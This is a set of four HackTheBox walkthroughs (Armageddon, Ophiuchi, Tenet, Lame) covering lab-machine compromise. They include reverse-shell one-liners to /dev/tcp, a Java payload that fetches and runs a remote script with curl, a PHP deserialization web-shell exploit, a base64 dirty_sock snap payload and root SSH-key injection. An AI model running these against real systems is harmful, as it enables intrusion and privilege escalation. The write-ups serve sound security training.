Armageddon – HackTheBox Machine | Writeup

Info

Armageddon is Linux-based easy machine, created by bertolis.

Enumeration

Let’s run network scan to check open ports and service versions.

Scanning Result

SSH and HTTP port are open. We should be able to visit page on 10.10.10.233.

Login Page

And yes, there is login page. Let’s explore this. On this page we can’t find anything interesting, but in source page and Wappalyzer…

Found Drupal Version
Wappalyzer Result

Exploitation

It was easy to discover it. Drupal 7.x has multiple vulnerabilities, including PHP object injection and remote code execution vulnerabilities. Let’s google it.

Drupalgeddon2 Exploit

This exploit name is actually very similar to Armageddon. Too easy if it’s correct one. Let’s git clone it and run it. It has very good explain how to use it, check it on GitHub here.

Downloading Exploit

Before running, make sure you have installed highline gem .

sudo gem install highline

And then run exploit.

./drupalgeddon2.rb http://10.10.10.233/
Getting Shell

And we got it. But there is not user.txt. It means we need more to explore.

User Escalation

Since we can’t use cd command, we need to manually explore it (ls /some/path or cat /some/path/file.txt).

Files

Interesting directory is sites, where we maybe can find credentials.

MySQL Credentials

And, we found it. Let’s connect to MySQL with these credentials. We can’t connect from our local machine, so, let’s login from shell we got. Since we can’t get actually MySQL shell, we will use Single MySQL Commands.

mysql -u [Username] -p[Password] -e "[Command to execute..]"
mysql -u drupaluser [email protected]*m23gBVj -e 'show databases'
Single MySQL Command

And we can see drupal database, let’s check tables.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'show tables'

And, users is there! Let’s check it.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'SELECT * FROM users'
Users

There is password hashes and usernames. First one, brucetherealadmin, has email added, [email protected] and that email is different from the other ones, so he might be main user. We will try to crack these hashes with john.

Cracked Password

I already did this machine, so I’ll just show the password john cracked earlier. Command for cracking is in image. Now, when we have credentials, let’s login. brucetherealadmin:booboo

User

Got user! Now, let’s own root.

Root Escalation

First, we’ll check sudo capabilities.

Sudo Capabilities

We can run snap install without using password! Great, we can find exploit to escalate privileges with snap. Let’s google it.

Results

We will check first one, named dirty_sock on GitHub. Clone it to your local machine.

Downloading Exploit

I tried to transfer both scripts on target machine, but it not worked. We need to install it on target machine manually. I was looking at scripts and found this in dirty_sockv2.py:

dirty_sockv2.py

So, we’ll copy this and print on target machine to .snap installation file, and we can install it on target system. We will use this command on target machine to make installation snap file:

python3 -c 'print("aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "==")' | base64 -d > installation.snap

And then,

sudo /usr/bin/snap install --devmode installation.snap

–devmode allows users to install snaps without enforcing security policies.

Installed

We will read README.md now to see how to use it.

README.md

Okay, so we need to become dirty_sock user. Let’s do this.

Changing User

Yay! We are dirty_sock! If you get error that user doesn’t exist, just reset the machine. I had same problem. Now, we will try to become root. Just type sudo su.

Root

Wooah, we got root! If it asks you for password, use dirty_sock as a password.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord

Ophiuchi – HackTheBox Machine | Writeup

Info

Ophiuchi is Linux-based medium machine, created by felamos.

Enumeration

First of all, I’ll run port scan so we can know which ports are open and service versions.

Scanning Result

And we see 2 open ports. SSH and HTTP. Let’s visit page on 8080 port.

Page on 8080 Port

We found Online YAML Parser. Nothing interesting found in source page, so I’ll simply google YAML Exploit.

Results

As always, I click on first results. So, this time we can see SnakeYaml Deserilization, and I will read that article.

SnakeYaml Deserilization

Author of that article was already created the exploit payload with GitHub article. Read it. Now, we can use that payload on our Machine YAML Parser. First, start Python server to see if payload triggers the server.

Now, hit PARSE.

Result

Wooah! It works! Payload triggered the server. I tried to get reverse shell this way, but it not worked. Let’s search for YAML Payload.

YAML Payload

I found this one with same exploit we used. We maybe can abuse it with this YAML Payload and get reverse shell. Git clone this.

git clone https://github.com/artsploit/yaml-payload.git

Exploitation

After short researching, we can see AwesomeScriptEngineFactory.java file:

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

We can use this script to get reverse shell. How?

 Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
 Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");

I tried to get reverse shell direct from this exploit, but it not worked. We need to create reverse shell bash file and then call it.

bash -c 'bash -i >& /dev/tcp/10.10.14.90/4444 0>&1'

Now, let’s modify Runtime.getRuntime().exec in exploit.

Runtime.getRuntime().exec("curl 10.10.14.90:1234/rev.sh -o /tmp/rev.sh");
Runtime.getRuntime().exec("bash /tmp/rev.sh");

First execution is transfer reverse shell script to server, and second one is running that script on server. Now, to prepare our exploit for running, we need to compile it since it is written in Java. Using javac and jar we can compile it. Go to main dir (yaml-payload) of cloned file so we can compile entire directory.

javac src/artsploit/AwesomeScriptEngineFactory.java
jar cvf exploit.jar -C src/ .

Now, we will again start our python server, and NetCat listener on port 4444, then run same payload on our 8080 Page.

Getting Shell

And we got shell as tomcat user. We don’t have permission to read user.txt. Let’s escalate to user.

User Escalation

After we got shell, it’s time for escalation. Let’s find how many users we have.

Only admin and there is user.txt. But we don’t have permission to read it. Since SSH port is open, I think we need to find creds for SSH login. We are tomcat, and creds might be in configuration directory. By default, these files are located at TOMCAT-HOME/conf. So, just type cd to get on default tomcat location.

Okay, so we can see there is conf directory. Enter into it, and explore.

I immediately noticed tomcat-users.xml and tomcat-users.xsd. I’ll read both of them.

Credentials Found

And we found creds for user in tomcat-users.xml. Let’s try to SSH into it with these creds. Username: admin Password: whythereisalimit

User

We got user! It’s time for root!

Root Escalation

First let’s check sudo capabilities with sudo -l:

Sudo Capabilities

We can see index.go file, so let’s check what that file is doing.

First, it reads from main.wasm and then check if it’s not equal to 1, it’s not ready to deploy, else it’s ready. Since main.wasm is not readable, I’ll transfer it to my machine and try to analyze it. On your local machine, run:

rsync -e "ssh" [email protected]:/opt/wasm-functions/main.wasm /path/to/save
Transfer main.wasm

WASM is Web Assembly, you can read more about it here. To read main.wasm, we need to decode it. How? We will use wasm2wat. This tool converts Web Assembly binary into S-expressions. It is a command line tool that takes a binary file as input and generates an output file containing the readable text. More about Web Assembly advanced tools can be found here. I will use some random internet wasm2wat tool. Click here for it.

Wasm2Wat

We need to change 0 to 1 (we saw that index.go script checks if it is equals to 1 or not). Now, copy that and now we need wat2wasm to convert it back to wasm. We will use that tool on same site, click here for it.

Wat2Wasm

Download it, rename to main.wasm, start python server and then transfer to machine.

Now, we need to try to run it and see what happens.

sudo /usr/bin/go run /opt/wasm-functions/index.go

And it’s ready to deploy. We will abuse deploy.sh and put our public key and then we will be able to connect to root with SSH.

echo 'echo "ssh-rsa AAAAB==========your_public_key==========" > /root/.ssh/authorized_keys' >> deploy.sh

And then, run again index.go script.

And now, you should be able to connect to root with SSH.

Root

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord

Tenet – HackTheBox Machine | Writeup

Info

Tenet is Linux-based medium machine, created by egotisticalSW.

Enumeration

First of all, I’ll run port scan so we can know which ports are open and service versions.

Scanning Result

Only two ports are open. They are 22 (SSH) and 80 (HTTP). Since it has opened port 80, we should be able to visit the page. Let’s type in our browser machine’s IP and go.

Page on Port 80

And we can see that is Apache2 Default page, nothing interesting can be found here. Let’s try to add tenet.htb (default domain name on HTB Machines are usually called machine.htb) in our local hosts. (/etc/hosts).

sudo nano /etc/hosts

Nano is one of the text editors. We’ll use it. So, with command above, you can open your list of local hosts. Now we can add machine ip and domain. Add this to /etc/hosts:

10.10.10.223    tenet.htb

Save it, and then type tenet.htb in our browser to see what we will get. And we getting WordPress page (you can see WordPress in footer). Now, let’s enum this site. Enumerating this, I have found “Recent Comments” and “neil” as author of the comment. It might be username. Let’s see what comment says:

Recent Comments

I continued with enumerating the site more, but nothing else interesting found. Since Neil is talking about migration, it can be another host called sator. We’ll try to reach it. Open your /etc/hosts and do the same thing as before, but this time add sator.tenet.htb. After that, let’s go to the site. It’s again Apache2 Default Page. Let’s try to go to some random path (write anything after slash: www.test.com/123test123) and it should say to us on which server we are.

And we got it, we are on sator.tenet.htb. Let’s explore it by searching for some another paths. Neil mentioned backups, so I was trying to reach sator.tenet.htb/backups but nothing. Tried some other paths, but still nothing. Let’s try to reach sator.php now, maybe we can get something if it exists on the server.

It exists! But unfortunately, we are not able to read the source of that file. Neil mentioned that backups are not removed, and sator.php might be in that backups. Let’s try to download it adding .bak at the end of the name. “.bak” is a filename extension commonly used to signify a backup copy of a file – More About .BAK.

Downloading File

And yes, it worked. They really should delete these backups, haha.

Exploitation

Let’s read this file, open it with your text editor.

File Content

Here we see that the script looks for a GET input variable arepo and unserializes it. We might be able to exploit it using PHP Object Deserialization. Here you can read more about it: Exploiting PHP Deserialization. Here is a class called DatabaseExport with a __destruct function implemented. This function is what we can use to get RCE. The function uses file_put_contents to write the variable data to the file defined in the variable user_file. If we go over to the URI sator.tenet.htb/users.txt, we see that the file exists and prints SUCCESS. So, we need to create exploit that will spawn shell.

<?PHP
class DatabaseExport
{
        public $user_file = 'exploit.php';
        public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.XX.XX/1234 0>&1\'"); ?>';
        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
        }
}
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/exploit.php");
?>

Don’t forget to change your IP Address. When we got exploit, we need to start nc listener and to run exploit.

nc -nlvp 1234

And, run exploit in another tab.

php exploit.php
Connection Received

And we got connection! Now, let’s spawn python reverse shell.

Shell Spawned

And we got our shell! We are web user.

User Escalation

We saw that site is based on WordPress, so let’s find wp-config.php where credentials should be. We are in /var/www/html directory, and when we list files, we can see wordpress folder.

User Credentials

We found credentials. SSH Port is open, so we can connect to it via SSH.

SSH User

And we got user via SSH. Now, grab the user flag, and paste it to HTB.

Root Escalation

We check what sudo capabilities our user has got using:

sudo -l
Sudo Capabilities

We can see that we can run /usr/local/bin/enableSSH.sh, let’s read it.

cat /usr/local/bin/enableSSH.sh

And we got:

#!/bin/bash

checkAdded() {

	sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)

	if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then

		/bin/echo "Successfully added $sshName to authorized_keys file!"

	else

		/bin/echo "Error in adding $sshName to authorized_keys file!"

	fi

}

checkFile() {

	if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then

		/bin/echo "Error in creating key file!"

		if [[ -f $1 ]]; then /bin/rm $1; fi

		exit 1

	fi

}

addKey() {

	tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

	(umask 110; touch $tmpName)

	/bin/echo $key >>$tmpName

	checkFile $tmpName

	/bin/cat $tmpName >>/root/.ssh/authorized_keys

	/bin/rm $tmpName

}

key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl [email protected]"
addKey
checkAdded

With this script, we can add our public SSH key to Root’s authorized keys. To copy your SSH public key, you need to create new or copy already existing keys. We will create new ones, on your local machine type:

ssh-keygen

Just pres ENTER, don’t add password, etc.. If it asks you to overwrite, press y and ENTER. Default location of SSH keys is /home/username/.ssh, so let’s cd into it and copy our public key. (id_rsa.pub).

SSH Public Key

Now, copy it and go to the box. We will create a simple script which will write our public key to /root/.ssh/authorized_keys and then we will be able to SSH into it. In box, open text editor (in my case, it’s nano), and make script with your public key that you have copied.

while true;
do echo "ssh-rsa YOURKEY" | tee /tmp/ssh* > /dev/null;
done
Script

Now, add executable permissions to exploit.sh:

chmod +x exploit.sh

Now, connect again to neil via SSH but in new tab, so we can run exploit.sh and enableSSH.sh. When you’re connected, then run exploit exploit.sh:

bash exploit.sh

Now, in another tab, run enableSSH.sh multiple times, with sudo:

sudo /usr/local/bin/enableSSH.sh

Run that command (with enableSSH.sh) multiple times so you can connect via SSH. In my case, I run it more than 50 times and then I have successfully connected to root. When you have run it enough times, try to connect to root:

ssh -i id_rsa [email protected]

This time, we are using private key to connect (id_rsa). If you tried too many times to connect but failed, try resetting the box.

Root

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord

Lame – HackTheBox Machine | Writeup

Info

Lame is first box ever created on HackTheBox. It’s Linux-based easy machine created by ch4p.

Enumeration

Since this machine is retired, and only VIP members can access it, I have different machine IP. You can find Machine IP in that machine’s page. For this machine, you need basic Linux knowledge. As always, I first start with network scanning to see which ports are open, service versions etc..

nmap -sC -sV 10.10.10.3
Explanation for Parameters
Scanning Result

Exploitation

In scan result, we can see FTP details, and anonymous login is allowed. Also, there is also mentioned FTP Version “vsFTPd 2.3.4”. Googling it, I have found – VSFTPD v2.3.4 Backdoor Command Execution, tried to run it but nothing. It might be a rabbit hole. After attempting to enter using the vsFTPd attack vector, Samba becomes the only target. Googling it for exploit, I clicked on first result – Samba “username map script” Command Execution – Rapid7, and it’s exploitable with Metasploit. Also, the exploit version matches with our. So, I’ll run Metasploit console and try this one.

msfconsole

And now, I’ll use search command to find that exploit.

Search Command in Metasploit Console

Found it! Let’s use it as exploit:

use exploit/multi/samba/usermap_script

Now, when we have loaded our exploit, let’s take a look on exploit options with command:

show options
Options for Exploit

Okay, we have options! Now, let’s set it properly. We have RHOSTS, and there we need to set Machine IP. RPORT we shouldn’t change, it’s set by default on 139. LHOST is our Local Machine IP, actually our VPN Connection IP. You can check it by typing:

ifconfig
Local Machine IP

Your Local Machine IP (on HackTheBox) should start with 10.10.XX.XX. Now, we can set our LHOST in Metasploit Console to the Local Machine IP:

set LHOST 10.10.XX.XX

Now, let’s set RHOST (Machine IP):

set RHOST 10.129.159.5
Exploit Options

And now, let’s try to run it and see what will happen. Use command:

run

Wait few seconds, and…

Shell Session

And we got it! Now, we can grab our flags and submit it. On HTB Linux Machines, user flag is always in User Directory. (/home/username/user.txt) and root flag is always in Root Directory (/root/root.txt). To get user, get into the /home directory and you can see 4 users there. I have checked all of them, and only user makis have user.txt file. To get root, simply read the file under /root/root.txt.

User & Root

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord